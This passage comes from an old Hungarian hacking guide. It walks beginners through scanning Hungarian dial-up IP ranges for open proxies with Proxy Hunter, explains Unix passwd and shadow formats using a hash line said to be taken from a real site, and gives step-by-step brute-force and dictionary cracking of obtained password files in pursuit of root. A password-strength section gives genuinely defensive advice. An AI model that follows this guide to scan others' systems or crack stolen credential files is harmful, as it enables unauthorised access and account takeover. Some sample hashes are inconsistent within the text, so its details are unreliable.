verziót:http://member.netease.com/~windzh/indexe.htm
17 3
Hackers’ Guide
************************************************************************************************
Proxy Hunter leírás Proxykat akarunk keresni, igaz? Ehhez definiálnunk kell a Proxy Hunternek feladatokat. A program ablakában három lap van (Tasks, Results, ProxySwitch). Kattintsunk a Tasks-ra (ha nem az aktív), majd az ablak alján az Add task gombra. Itt természetesen minden le van írva, mint ahogyan a programban mindenütt, csak hát ki olvassa végig ezeket, foleg, ha nem tud angolul, igaz? Állítsuk be a Task type-nél a Searching task -ot, és nyomjunk Next-et. Kattintsunk a Defined ranges -re. Elougrik egy ablak, ahol beállíthatjuk, hogy milyen IP-cím tartományokban keressen majd a program. Újakat adhatunk hozzá az Add gombbal, illetve a többi gomb is meglehetosen egyértelmu. Ha az Add -ra kattintunk, a legegyszerubb, ha fölül Start&End range -t állítunk, beírjuk az induló címet, a végcímet, az Annotationhoz valami megjegyzést írunk (pl. "Amerikai wingatek") és OK-t nyomunk. A muveletet többször is megismételhetjük. Ha végeztünk, jelöljük ki az egész listát, amit hozzáadtunk, és mentsük el egy fájlba a Save gombbal. Utána kattintsunk az Use-ra. Az elozo ablakba jutunk vissza, ahol láthatjuk hogy a kijelölt tartományokat a program felvette. Kattintsunk a Next -re. Itt fogjuk beállítani, hogy melyik portra fogunk keresni. A Defined -ben hasonló ablakot kapunk, mint az elozo. Itt is az Add gombbal tudunk hozzáadni portokat a feladathoz. Beállíthatunk port-tartományokat is, ekkor a tartományban levo összes portot végig fogja nézni minden számítógépnél, hogy nyitva van-e. Ha csak egy bizonyos portra akarunk keresni, akkor állítsuk be a Port range -t, és írjuk be a portot, ha pedig tartományra, akkor Single port -ot (tehát ez egy little bug a programban). Miután meghatároztuk a port számát, adjuk meg, hogy az adott porton milyen szolgáltatást keresünk (HTTP, SOCKS, FTP, Telnet(WinGate) és Unknown). Ha pl. FTP-t állítunk be, akkor a proxy hunter, miután talált egy nyitott portot, le fogja ellenorizni, hogy a talált porton ftp-szolgáltatás van-e. Ha Unknown -t állítunk be, akkor nem nézi meg, hogy mi van a nyitott porton, hanem automatikusan beírja találatnak. Kattintsunk az OK-ra. A muveletet csakúgy, mint az elobb, többször is meg lehet ismételni. Utána jelöljük ki a listát, és kattintsunk a Use -ra. A program fel fog tenni egy kérdést "Must try?", ami egy kis magyarázatra szorul. Az Use gomb hatására a kijelölt portokat hozzáadja a feladathoz. Ha az egész listát jelöljük ki, akkor az összeset. De tegyük fel, hogy a beállított IP-tartományban mi Wingate-ket és SOCKS-okat akarunk keresni. Ha beállítjuk egy adott portra a "Must try" opciót, akkor a Proxy Hunter minden számítógépnél meg fogja nézni, hogy nyitva van-e. Ha talál legalább egy "Must try" portot, csakis akkor nézi meg a nem "Must try" portokat. Ez azért kell, mert nagyon gyakori, hogy pl. a Wingate-k és a SOCKS-ok együtt fordulnak elo (tehát ugyanaz az IP Wingate és SOCKS is egyben). Ekkor elég, ha csak az egyikre állítunk be "Must try"-t, és ez nagyon felgyorsítja a keresést, hogy
17 4
Hackers’ Guide
a másikat nem kell mindenhol megnéznie (természetesen ezzel esetleg párat nem fog megtalálni). Nem maradt más dolgunk, mint hogy a "Finish"-re nyomjunk és ezzel felvettünk egy feladatot. Ezt el is menthetjük, a Tasks menübol az Export-tal. Több feladatot is felvehetünk, és a Proxy Hunter ezeken végig fog sorban menni. Ha befejeztük, kattintsunk az eszközsorban a kék háromszögre, úgy néz ki, mint egy Play gomb a videón. Váltsunk át a Results lapra, itt fogjuk látni a találatokat (ha lesz egyáltalán). Azok a találatok a nyerok, ahol GOOD! van a Status oszlopban (némelyik Verification timeout-os is jó lehet). Nagyjából ennyi. A programnak van még számos extra funkciója, de ennyi elég lehet a használatához. Itt van egy fájl, amit a Tasks>Import segítségével lehet beimportálni a programba. Ha végigfuttatjuk, végigkeres egy csomó magyar modemes IP-tartományt SOCKS után kutatva. A találatokat utána fel tudjuk használni például irceléshez. [Hungary.tsk, 708 byte] Ez pedig egy másik file, ami csak egy IP-tartomány, ha netán mást portot szeretnénk keresni. Ehhez új feladatot kell definiálnunk, majd importáljuk a fájlt, utána pedig a fent leírt módon állítsuk be a kívánt portot. [HungaryDialup.ipr, 398 byte] Ja igen. A keresés közben használjunk jól bekonfigurált tuzfalat, mert sokan támadásnak hiszik, ha valaki csatlakozni akar valamelyik portjukra, és vissza fognak loni. Ez azt eredményezheti, hogy lekapcsol a modemünk, vagy megfagy a gépünk.
************************************************************************************************
Password
A jelszavakról általában A jelszó amit a virtuális világban használunk, talán a reális világunk átjárója. A mai világban körül vagyunk véve jelszavakkal, még ha nem is egészen így hívjuk őket. Ott van a bankszámlánk, a mobiltelefonunk PIN kódja... stb. És vannak emberek akik ezt meg akarják szerezni, és ha nem vigyázunk, és óvatlanok vagyunk ez sikerül is nekik. Itt találsz majd egy pár információt, hogy hogyan is csínálják, és, hogy hogyan is védekezhetünk ellenük sikeresen.
17 5
Hackers’ Guide
Sokszor a védelmi rendszer hagy némi kívánnivalót magaután. Erre jó példa az eredeti windows 95-ben található jelszótárolási mechanizmus. (Ez a baki az OSR2ben javítva lett.) De ha a tárolási rendszer jó akkor csak egy féle módszerrel lehet a jelszót megtörni: az összes variációt kipróbálni. Ilyenkor fontos tudni, hogy mennyi a lehetséges összes előforduló jelszó és a keresési sebesség. A lenti táblázat a jelszókeresési időt ábrázolja a jelszó hosszának és a karakterek függvényében. A keresési sebesség 100.000 jelszó/sec. (Elég tisztes sebesség!) A jelszó hossza / Betűkészlet 4 5 6 7 8 9 10
Azonos betű nagyság, csak betű. (26) 0 0 50 perc 22 óra 24 nap 21 hónap 45 év
Egyféle betű nagyság, betűk + számok. (36) 0 10 perc 6 óra 9 nap 10.5 hónap 32.6 év 1159 év
Különböző betű nagyság. (52)
Minden nyomtatható karakter. (96)
1 perc 1 óra 2.2 nap 4 hónap 17 év 881 év 45,838 év
13 perc 22 óra 3 hónap 23 év 2287 év 219,000 év 21 millió év
A felhasználó választ egy jelszót, és a hacker megpróbálja azt feltörni. A felhasználó megpróbál olyan jelszót választani - és olykor sikerül is -, amit szerinte nehéz kitalálni, a hacker pedig az idővel van örök harcban. Mert ugye a táblázatból kitűnt, hogy egy sima 6 karakteres csak betü és állandó betűnagysággal írt jelszót (PL: jelszo) fel lehet törni ~1 óra alatt. De ha már 1(!) karakterrel többet írok hozzá és az az egy karakter szám, és esetleg van benne változó betűméret (PL: jELsZo7) akkor az idő megugrik ~2 napra. De ha egy 8 karakter hosszú jelszót kicsit megbolondítok (PL: I$am@Ok!) akkor ennek feltöréséhez 2287 év lesz. Ez egy örök harc volt/van/lesz. Persze itt most nem szólok a "gagyi" jelszavakról, mint például a felhasználói névvel megegyezők, vagy a kutya neve vagy ilyen marhaságok... És az intelligens feltörő módszerekről sem , ahol már a mesterséges intelligencia elemzi a felhasználó viselkedését, gondolkodásmódját, és abból próbálja összerakni, hogy mégis milyen szisztéma szerint választotta ki az adott felhasználó a jelszót. Pedig a jövő ezé lesz!) Milyen jelszavakat is szeretnek a hackerek? Azon kívűl, hogy a megfejtetteket... =D Bizony ha az emberek maguknak generálnak jelszót akkor sokan beleesnek a "kutyámneve" csapdába. Gyakran az emberek olyan jelszót találhak ki amire egy kis háttérnyomozás után rá lehet jönni. Például, foglalkozás, az említett kutyám/macskám/lovam/barátnőm/barátom neve, utca neve ahol lakik, személyi szám vagy más igazolvány szám, neki vagy családtagja születési éve kombinálva, stb... Vagy ha nem is ilyen egyszerűket akkor közismert jelszavakat. Ezeket a gyakrabban használt jelszavakat a hackerek tudják és ezekkel próbálkoznak először. Ha esetleg érdekel egy ilyen szólista itt: ftp://ftp.cso.uiuc.edu/pub/security/wordlists/ elvileg találhatsz egy csomót. Ha, beszélsz idegen nyelveket (elég egy kicsit) akkor ezeket a szavakat használhatod jelszóként. A hackerek legtöbbször angol nyelvű szótár-fájlokat
17 6
Hackers’ Guide
használnak, mivel az internet nyelve az angol. Ha mondjuk a jelszóban szerepel például egy német, vagy indiai, szó az külön poén, hátha még számokkal helyettesítesz néhány karaktert... sőt ha visszafelé írod... =) A talán legjobb megoldás a számítógép generálta véletlenszerű jelszó. Sajnos ez sokszor nem megfelelő mert így eléggé megjegyezhetetlen jelszavak jönnek ki (PL: zmg74u5p) De ha nem megjegyezhető akkor bizony előbb utóbb le lesz írva. Vagy a jegyzetfüzetbe, vagy a számítógépen egy file-ba. Ezek pedig a legrosszabb megoldások. A jegyzetfüzetet el lehet hagyni, a számítógépet pedig fel lehet törni. (Persze ha mondjuk egy txt file-ban pgp-vel lekódoljuk,és betömörítjuk jelszavazva rarral akkor az kicsit biztonságosabb. Azért ne zippel mert az sec perc alatt feltörhető!!!) Egyszer majd csak születnek olyan programok amik majd humánus de nehezen megfejthető jelszavakat generálnak... =) Ha már saját magunk akarunk könnyen megjegyezhető jeszót készíteni akkor érdemes két értelmes szó közé beszúrni egy karaktert mondjuk a $ jelet. Ez megnehezíti a hacker dolgát mert ő nem tudja, hogy az alma$körte jelszóban van 2 értelmes szó csak valamilyen karakterrel van elválasztva, és úgy unblock nézi az egészet. Meg lehet nézni hogy egyébként is egy 10 karakteres jelszónál azonos betűmagassággal is több év (~40) a megfejtési idő. Írok egy kicsit a (case sensitive) változó betűnagyságú jelszavakról is... =) Ez röviden azt takarja, hogy a jelszót nem csupa kis, vagy NAGY betűvel írjuk hanem öSszEViSsZa. a neten ez a legkedveltebb módszer a jelszavak kitalálása szempontm jából. Két ok miatt is. 1. Egyszerű őket megjegyezni. Ha egy értelmes szót megbolondítunk egy ilyen kisbetű/NAGYBETŰ trükközéssel, sokkal nehezebb lesz megfejteni. (Egy 8 karakteres jELszOiM jelszónak 17 év kell a megfejtéséhez!) 2. A rövid 2-e betűs szavak nincsenek benne a szótárakban mind. És ha ezeket egymás után írva kreálunk jelszót, azt is húzós lesz megfejteni. Például: BeKiLeFel. Az általános iskolában tanult igekötőket egyszerűen egymás után írtam, de az első betűiket nagy betűvel. A megfejtéséhez a táblázat szerint 880 év kell. Ha van egy nagyon-nagyon gyakran használt jelszó, akkor arra érdemes a CAPS LOCK technikát alkamazni. Hogy mit is takar ez? Egyszerű: a jelszó megadásánál be kell kapcsolni a caps lock billentyűt. (Ne a shiftre tenyereljünk rá az feltűnőbb! =)) Ha ezt kombináljuk számokkal és kis és nagy betűkkel akkor meglepően jó eredményt érhetünk el. Például. MacskaJajj7%7. Itt látszik, hogy az "M" a "J" és a "%" betűnél nyomtunk SHIFT billentyűt. De ha így írjuk be: mACSKAjAJJ=5= akkor már kissé megváltozik az eredmény. Valamikor a jelszóhoz egy hacker eléggé extrém úton jut hozzá. Például egy felhasználó egy féle sémára épülő jelszórendszert használ és abból egyet megszerez. (PL: Gabor%AccExtra, vagy Gabor%AccSwi) innentől eléggé nagy a valószínűsége, hogy az internet elérési jelszava valami Gabor%AccSzolgaltato lesz vagy mondjuk a CS.HU-n lévő honlapjának a jelszava Gabor%AccCs lesz. Mit tudsz tenni?!!? •
Először is használj jelszó tároló programot. Az ilyen jó program automatikusan generál új jelszavakat az elérhetőségeidnek, és így csak egy fő jelszót kell választanod és azt megjegyezned a többit a program végzi el helyetted. Amit ismerek az a PadLock IT de a régebbi verzióknál a program eltárolt jelszavait 17 7
Hackers’ Guide
még egy óvodás is vissza bírta fejteni... =) Szóval inkább nem ajánlok ilyen programot, mert nem ismerem mindet. •
Készíts elég hosszú jelszavakat! Egy nagyon jól megépített és bekonfigurált rendszernél (PL: Linux) elég 4 karakteres jelszó is. De mondjuk már a vacak windoze-nak a 9 karakteres erősen javasolt. Fontos azonban megjegyezni, hogy sok rendszer maximálja a jelszavak hosszúságát és ez eléggé behatárolja a jelszavaink bonyolult kialakítását.
•
Használj különböző karaktereket, és még kombináld össze más egyéb jelekkel is! PL: I$am@K! egy eléggé jó és egyszerű jelszónak tűnik. Az I am OK! ből lett kialakítva. Es van benne kis és nagy betű, és egyéb más karakter is.
•
Mindíg tartsd az emlékezetedben: A rendszerd megbízhatósága annyit ér mint a leggyengébb láncszemének megbízhatósága! Hiába van 20 karakter hosszú mindenféle bonyolult jelszavad ha azt a MS Word v7.0 -val használod. Ez esetben másodperc töredéke alatt fel leszel törve...
Eredeti: SiRiUs Š. feb.-'99. TnX tO "Vitas" - H3XR00T http://hexnet.hpage. net/
************************************************************************************************
A linux passwd file felépítése Mielőtt a vén rókák elkezdenének suxxolni le kell, hogy szögezzem, hogy ez a doksi a kezdőknek készült! Ők meg használják egészséggel! =) Itt főleg a shadowolt és a nem-shadowolt passwd fileok különbségéről lesz szó. Marha nagy... csak egy "x" vagy "*" =D Először is. A linux passwd filejai ezekben a könyvtárakban találhatóak valahol : /etc/passwd vagy az etc/shadow. Ezekhez ha hozzáférsz akkor kb az alábbi eredményt láthatod, ha nincsenek shadowolva a jelszavak: Az alábbi passwd file a CS.HU-ról lett leszedve. =) admin:aaKRsX3J.tvTU:[email protected]:Webmaster:30/9/1999:never:top Nos nézzük mi mit jelent! admin: Ez a felhasználói név. Itt most admin. A névből ítélve valami nagy fejes lehet... =) aaKRsX3J.tvTU: Ez a furcsa karakterekből álló betűhalmaz a jelszó. No mielőtt mindenki vadul elkezdene telnetelni a szolgáltató 79-es portjára elárulom, hogy ez kódolt jelszó és még meg kell fejteni valami unix passwd törő proggyval, mondjuk a
17 8
Hackers’ Guide
John the Ripper -rel vagy a Cracker Jack stb... programokkal. :::::::: Az ezek után jövő kettőspontokkal és egyéb marhaságokkal amik köztük vannak azokkal ne folgalkozz! =) Kiegészítés: Valahol a jelszó után egy : -tal elválasztva van egy vagy több szám is. Pl: Így: admin:aaKRsX3J.tvTU:253:10:CSAdmin:/cs/admin/www:bin/sh Ilyen esetben az egyes mezők ezeket jelentik: Felhasználói nev: admin Kódolt jelszó: aaKRsX3J.tvTU Azonosító szám: 253 Csoportazonosító: 10 GCOS mező: CSAdmin Home könyvtár: /cs/admin/www Kezdeti shell: /bin/sh No igen. De már hallom is a kérdést, hogy "én is szereztem egy ilyen passwd file-t de nem egészen ilyen formátumú...". Ha ez az eset áll fent akkor te valószínűleg egy shadowed passwd file-t szereztél meg. (Vagy ha nem akkor kérdezd meg a rendszergazdát, hogy mégis ő tudja-e, hogy milyen passwd file-t szereztél meg tőlük =)))) Hogy is néz ki ez valójában?: root:x:0:0:root:/root:/bin/bash Mint látható, sokkal rövidebb és a krixkrax karaktereket felváltotta egy x (szokott * is lenni). Nézzük meg, hogy ebben a felállásban mi micsoda: root: Ez még mindíg az a felhasználói név amire minden hacker/cracker/istentudjami áhítozik. =D x: Hoppááááááááá. Mivel a passwd file shadowolva van ezért a rejtjelezett jelszót felváltotta egy "x" karakter. root:/root:/bin/bash: Ez elvileg a shell mit az user használhat, kaphat. =I - H3XR00T http://hexnet.hpage.net/
************************************************************************************************
Jelszófeltörés
17 9
Hackers’ Guide
Nnna........! Jelszó fejtő programot tettem ide. Unixhoz (szerintem) nem sokan értenek, ezért azt kihagyom. Ez a cain prg relativ lassú, de sok mindent tud. Indulásnak jó lesz. Win95/98 alatt műxik. Pár szó a titkositásról, hogy legyen fogamad arról amit csinálsz. Talán az első hires alkalmazója Julius Ceasar volt. Innen ered a neve is a Ceasar féle titkositásnak(a technologiára nem térnék ki). A mostanában használt módszer a DES (Data Encyption Standard), de van még ezer féle. A módszer a következő: egy 64 bites nyilt szöveget 64 bites titkositott szöveggé alakit, egy 56 bites kulcs segitségével. Az érzékelhetőség kedvéért csináltam egy ábrát is.
A felcseréléseket a P , a helyettesitéseket az S doboz végzi. A P doboz nem más, mint egy 8 be és kimenelelű áramkör egy bemenő paraméter által meghatátozott össze-vissza kötött ki és bemenetelekkel, azaz a bemeneti 8 bit fecserélésével allitja elő a 8 bites kimenetet. Az S doboz a bemenetére adott 3 bit nyilt szöveget alakitja át 3 bit titkos szöveggé. Az első lépésben a kulcstól független felcserélés történik, mig az utolsónál ennek a forditottja. Itt az első 32 bitet felcserélik az utolsó 32-vel. A köztük lévő 16 fokozat ugyanigy műxik, de a kulcs más-más része határozza meg az alkalmazott P, S dobozok adott felépitését. Ha ezt az ember felirja logikai fügvényekkel, akkor az alapján készithető egy (elvi) titkosito prg. Az okosok azt mondják, hogy az nem jó, amit pár év alatt vissza lehet fejteni. Különbözö cégek mikor piacra dobnak 1-1 ilyent, altalában sikerdij üti a markát annak aki vissza fejti a holmit.
************************************************************************************************
Jelszavak törése A jelszavakat általában a következo módszerrel titkosítják: A jelszóból létrehoznak egy fix hosszúságú jelsorozatot, bizonyos hash nevezetu függvény(ek) segítségével. Minden különbözo jelszóhoz különbözo hash jelsorozat generálódik, a legkisebb változtatásnál is szinte az egész jelsorozat teljesen más lesz. Az algoritmust viszont nem lehet megfordítani, így ezzel a módszerrel nem kapjuk meg a jelszavakat, csak az egyik irányba muködik a dolog.
18 0
Hackers’ Guide
A jelszótöro progik muködése a következo: Eloállítják a kipróbálandó jelszóból a hash függvény segítségével a fix hosszúságú jelsorozatot, majd ezt hasonlítják össze a password fájlban lévo, jelszóval, amire szintén rá van eresztve a hash algoritmus. Ha megegyezik a két hash jelsorozat, akkor megtalálta a jelszót. Ha nem, akkor jöhet a következo lehetoség. A passwordök megfejtésére van néhány módszer, ezek a következok: brute force attack: Ez a legidoigényesebb megoldás, miszerint végigpróbáljuk az összes lehetséges megoldást. Eloször kezdjük a legrövidebb jelszavakkal : "a", "b", "c", ... "z", plussz még számok, illetve más speciális karakterek. Az átlag lamer emberek nem használnak ilyen "bonyolult" jelszavakat, de kivétel erosíti a szabályt, és különben is, cirka 26 lehetoség nem nagy durranás az esetleges több száz-ezer millió vagy milliárd lehetoséghez képest. Persze ha be van állítva, hogy legalább 6 karakteres legyen a jelszó, akkor felesleges a rövidebbekkel futtatni a jelszótörot. Ezek után egyesével emeljük a jelszó hosszát, és így is kipróbáljuk az összes lehetoséget, a-tól z-ig. Elonye hogy így biztos hogy megtaláljuk a jelszót , hátránya az idoigényessége, egy jobb gépen is napokig/hetekig tarthat a törés, és ez nem a legjobb megoldás, ha a jelszavakat mondjuk kétnaponta váltogatják. Ilyen esetben nem valószínu, hogy ilyen egyszeru jelszavakat használnak, szinte biztos hogy van benne néhány nagybetu és szám is. Persze csak akkor kapjuk meg így a jelszót, ha a jelszótöro proginak megadtuk az összes olyan karaktert, ami elofordulhat a jelszóban. Pl.: a jelszó "aaaa3" akkor hiába futtatjuk úgy a progit, hogy próbálja végig az összes olyan jelszót, ami tartalmazza az a..z betuket. dictionary attack: Ennek a módszernek a hatékonysága csak az emberi lustaságtól függ, miszerint az emberek nagyrésze hétköznapi szavakat használ jelszóként (vagy éppen a keresztnevét, vagy más hasonló publikus adatok magáról), részben ezért, hogy el ne felejtse (lásd pl.: a feltört elenderes jelszavakat). Kell hozzá lehetoleg egy minél nagyobb szótárfájl, ami az adott nyelv szavaiból tartalmaz lehetoség szerint minél többet, esetleg még egy angol vagy német. A módszer lényege az, hogy a szótárfájl szavaiból egyesével eloállítják a kódolt jelszót, majd ezt hasonlítják össze a password fájlban találhatóakkal. Ezzel elég hamar lehet végezni, ajánlott hozzá egy minél nagyobb szótárfájl. (Egy fokkal "bonyolultabb" jelszóként szokták használni a szó visszafelé írt alakját.) hybrid attack: Ez az elobbi két lehetoség kombinálása, arra a tényre épül, hogy a felhasználók sokszor választanak olyan jelszót, ami egy sima szóból és egy-két egyéb karakterbol áll (pl.: zsuzsa45, kert12). Példának ismét csak álljanak itt az elenderes jelszavak. Ehhez is csak egy szótárfájl kell, meg lehetoleg olyan jelszótöro, ami ismeri ezt a lehetoséget. Ha nincs olyan, akkor az sem baj, írjunk mi egy kis progit, ami egy rendes szótárfájlban található minden egyes szóból elkészíti a hybrid attackes változatait, majd ezeket beleírja egy másik fájlba. A jelszótörot ezek után már csak a hybrid szavakat tartalmazó - jóval nagyobb - jelszó fájllal kell futtatni. Ez a megoldás még mindig sokkal gyorsabban vezethet eredményhez, mint a brute force attack. A hatalmas hybrid szótárt esetleg fel lehet darabolni több gép között, így párhuzamosítva a törést. Gyorsítási módszerek: Itt nem térek ki a grafikus felületek eroforrásigényeire, szerintem mindenki számára egyértelmu, hogy két ugyanolyan jól megirt program közül a karakteres felületü
18 1
Hackers’ Guide
sokkal gyorsabb lehet, mint (esetleg windowsos) grafikus felületet használó társa. Persze a mai PII-es és Celeron proceszokon nemsok küldönbséggel fut a 16 bites kód, mint egy 200-as pentiumon, ezért ebbe a hibába sem szabad beleesni. Ha a próbálgatás gyorsan megy - pl.: másodpercenként több százezer kombináció végigpróbálása - akkor még véletlenül sem szabad minden kombinációt kiiratni a képernyore, elég csak százalékban, vagy mondjuk percenként az éppen aktuálisat, mivel ez is elég sok idot elvehet a törésbol. A brute force törésen azzal is lehet gyorsitani, hogy nem abc sorrendbe rakjuk a betüket, amelyek a jelszót alkotják, hanem elofordulási valószinüségüknek megfeleloen. Mindenki tudja, hogy a magyar szavakban a legtöbbször eloforduló magánhangzó az "e" betü, rakjuk ezt a lista elejére! (Tehát ezentúl nem "abcdefghij...z"-t adunk meg a programnak, hanem "eabcdfghij...z"-t.) Persze ezek minden szakmai szövegnél másként alakulnak, hiszen egy szakmai vagy egyéb terület, téma gyakran eloforduló szakkifejezései erosen befolyásolhatják ennek a listának az alakulásást. Bármelyik módszernek általában csak akkor van értelme, ha hamarabb sikerül megfejteni a jelszót, a következo jelszócsere idopontjánál. Ehhez nem árt egy gyors gép, vagy akár több is. Persze ha megint figyelembevesszük az emberi lustaságot, akkor - ha nincs is benne a jelszó semmilyen szótárban - érdemes lehet a lejárt passwordöket elrakni egy szótárfájlba, mert lehet hogy ezek "hybrid" változatai lesznek a következo jelszavak. Sun-Zero [email protected]
************************************************************************************************
Jelszótörés Sokan kértétek, hogy erről a témában írjak részletesebben, mert már hú de sok jelszó fileotok van, de nem tudtok vele mit kezdeni. Ja igen és az is fontos volt, hogy érthető legyen. Na ennél érthetőben aztán nem tudom leírni, de aki ezek után is bénázik / nem ért valamit az már vessen magára! Nos itt van tehát közkívánatra. Először talán 1 kis ismertető a jelszófileról. A Hol találjuk a passwd fájlokat című cikkben le van írva, hogy hol találjuk őket. Mivel legtöbben erre voltatok kiváncsak a Linuxban álltalába a etc/passwd, vagy az ect/shadow fileban található. Íme így néz ki: root:Fpkd1rH58rmi:0:0:root:/root:/bin/bash daemon:*:1:1:daemon:/usr/sbin:/bin/sh bin:*:2:2:bin:/bin:/bin/sh sys:*:3:3:sys:/dev:/bin/sh sync:*:4:100:sync:/bin:/bin/sync
18 2
Hackers’ Guide
games:*:5:100:games:/usr/games:/bin/sh man:*:6:100:man:/var/catman:/bin/sh lp:*:7:7:lp:/var/spool/lpd:/bin/sh mail:*:8:8:mail:/var/spool/mail:/bin/sh news:*:9:9:news:/var/spool/news:/bin/sh uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh proxy:*:13:13:proxy:/bin:/bin/sh majordom:*:30:31:Majordomo:/usr/lib/majordomo:/bin/sh postgres:*:31:32:postgres:/var/postgres:/bin/sh www-data:*:33:33:www-data:/var/www:/bin/sh backup:*:34:34:backup:/var/backups:/bin/sh msql:*:36:36:Mini SQL Database Manager:/var/lib/msql:/bin/sh operator:*:37:37:Operator:/var:/bin/sh list:*:38:38:SmartList:/var/list:/bin/sh irc:*:39:39:ircd:/var:/bin/sh gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats/gnats-db:/bin/sh alias:*:70:65534:qmail alias:/var/qmail/alias:/bin/sh qmaild:*:71:65534:qmail daemon:/var/qmail:/bin/sh qmails:*:72:70:qmail send:/var/qmail:/bin/sh qmailr:*:73:70:qmail remote:/var/qmail:/bin/sh qmailq:*:74:70:qmail queue:/var/qmail:/bin/sh qmaill:*:75:65534:qmail log:/var/qmail:/bin/sh qmailp:*:76:65534:qmail pw:/var/qmail:/bin/sh nobody:*:65534:65534:nobody:/home:/bin/sh uservagyok:Hgjrhhr851h:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash Na ebből nekünk 1enlőre a root:Fpkd1rH58rmi:0:0:root:/root:/bin/bash sor a fontos + a uservagyok:19S/JDGNuqnek:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash sor. A többiek nem felhasználók ilyen userek, hogy mail + daemon+games + proxy stb... :)) nincsenek ezek a rendszer működéséhez szükséges operátori számlák, de ez most nem lényeg. Vizsgáljunk + jobban 1 sort: uservagyok:19S/JDGNuqnek:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash uservagyok: Hgjrhhr851h: 1000: 1000: GECOS: /home/uservagyok: /bin/bash:
felhasználó neve felhasználó kódolt jelszava felhasználő azonosítója felhasználó csoport azonosítója felhasználó neve felhasználó alap könyvtára felhasználó shellje
A GCOS vagy GECOS az alapértelmezett ezt később + lehet változtatni a chfn paranccsal. A Hgjrhhr851h és a Fpkd1rH58rmi nem valós kódolt pw-k, bizonyos okok miatt (tehát ne próbáljátok visszafejteni).
18 3
Hackers’ Guide
Úgye a root a fontos, mert az a rendszergazda. Csakhogy álltalába a rendszergazda olyan kódot ad + amit sok időbe telik visszafejteni (számok, kis és nagybetű stb.) (DE nem mindig) a user meg álltalába bénát (értelmes szót stb.) Ez most végül is mind1. Úgyis észrevesszük, ha már 50 éve fejtünk vissza 1 pw filet és semmi:)))) Habár a UNIX rendszerekben a jelszó max. 8 karakter hosszú lehet, ez ne tévesszen + senkit, mert így is 1 [A-z 0-9..] -es és 8 karakter hosszú pw-t 1000000 jelszó/seces sebbel (1 jó pw törő progi kb. így dolgozik) is kb. 177.35 év +törni. No de ilyen pw-k nagyon nem gyakoriak. (nem a fasz nem) :)) Na elég a hülyeségből, majd ha máshogy nem megy, akkor user szintről feltornásszátok magatokat roottá, vagy nem:) Ja, majd el felejtettem akkor van szívás ha szemét, túlbuzgó rendszergazda ellenőrzi a userek béna pw-it, és +változtatja ilyen 177 éves szintűre. A kis kitérő után akkor kanyar vissza az eredeti témához. Indítsátok el Pw törő a progit. A Password crack és prg-k fejezetnél található (NT Unix Password Cracker). Ekkor ez a kép jön be. Na most részletességről lévén szó, clickeljetek rá szépen a Get Cracking gombra.
Ezután ez a kép fogad titeket. Password file...tyúú ez mi lehet?? Na itt most nem kell mást tenni, minthogy átnevezitek a pw filet *.txt-re. pl: passwd.txt. A browse-al + keresitek. Ha minden ok akkor kb. így kell kinéznie:
18 4
Hackers’ Guide
Output. Na most 1 nagyon nehéz dolog jön! :)) Készítsetek 1 tetszőleges nevű txt filet. pl: pwfejtés.txt. Ebbe a fileba kerül majd az eredmény (+fejtett pw-k) browse stb aztán enter. World list.. Ide kell berakni a netről vagy innen-onnan leszedett filet ami minél nagyobb annál jobb. Akkor van jelentősége, ha feltételezzük, hogy értelmes szó a pw. Így gyorsabb a fejtés. Ilyen filet mi is csinálhatunk. Nem nagyon használok ilyet. Ha ilyen nincs akkor a brute-force attack (nyers erő) módban kezd el működni, ami rules.
18 5
Hackers’ Guide
Ezután be lehet álltani, hogy számokat is nézzen (0-9) + symbols-t is lehet benyomni + minden szart, de az lassítja a keresést, de biztosabb, hogy +találjuk a filet. Az a véleményem, hogy ha van a pw-ba symbol + hasonló szarok akkor az a pw már 177 éves effektus lesz, :)) úgyhogy ne rakjuk be, mert úgyse várjuk ki 1 ilyen pw-nek a +fejtését. (a (0-9) azért hasznos!!!) Akkor, ha minden kész click a search-ra. Még nem vagyunk készen. Most jön a legbonyolultabb része az egésznek. Ki kel menni a frigóhoz és elővenni a Fantát, esetleg sört stb. és várni kell!!! :))) Ha vártunk eleget, akkor azt kell csinálni, hogy várjunk még 1 picit, és ha ekkor sincs semmi, akkor (frigóhoz ki) öntünk 1 kis vodkát is a fantába, mert már kezdünk ingerültté válni, és ez majd oldja a feszkót. (vodkanarancs rules 4ever) Utána még várunk 1 kicsit és utána nézzük meg mi történt. Ha sikerrel jártunk és találtunk 1 pw-t akkor ez a kép fogad minket:
Igen, találtunk 1 pw-t. Ekkor 1000-rel megnézni a pwfejtés.txt-t és mondogatni, hogy remélem a root pw-t találta meg, remélem a root pw-t találta meg. Aztán bassza+ csak a userét nyomta ki szöveg jön :)) Ha csak a userét akkor se csüggedjünk azzal is nagyon sok mindent lehet már csinálni! pl: várjunk tovább.:)) Álltalába amúgy is ezt löki ki előbb. Akkor vizsgáljuk a pwfejtés.txt-t.
Cracking for 'C:\ntcrack\Pw.txt' -->Started: Wednesday, January 1, 2000 at 17:11:34 --->Number of accounts: 5 -->Crack method: Brute force -->Using: Lowercase alphabet, Digits.
18 6
melyik pw filet törtük mikor csináltuk e remek tetett mennyi betűből állt az account Brute force (erről már volt szó) ezekről is
Hackers’ Guide
-->Min length: 3 Max length: 8 -->Starting password: aaa Account: uservagyok has password: user1 -->Cracking stopped; found 1 passwords. -->Cracking finished: Wednesday, January 4, 2000 at 21:23:52 -->Last password tried: uxrg
minimális / maximális jelszó méret. (ezt magától állitja a prg) honnan kezdte a prg a fejtést uservagyok felhasználónak (user név) a jelszava user1 (*) Ez az 1ik amit kerestünk. 1 pw nél leálltunk (mi a ráknak több???) :)) mikor végeztünk (ez akkor lényeges ha több évig fejtettünk, és rájövünk felesleges volt a sok időt erre kúrni, mert addigra megváltoztatták) :)) utolsó próbált pw
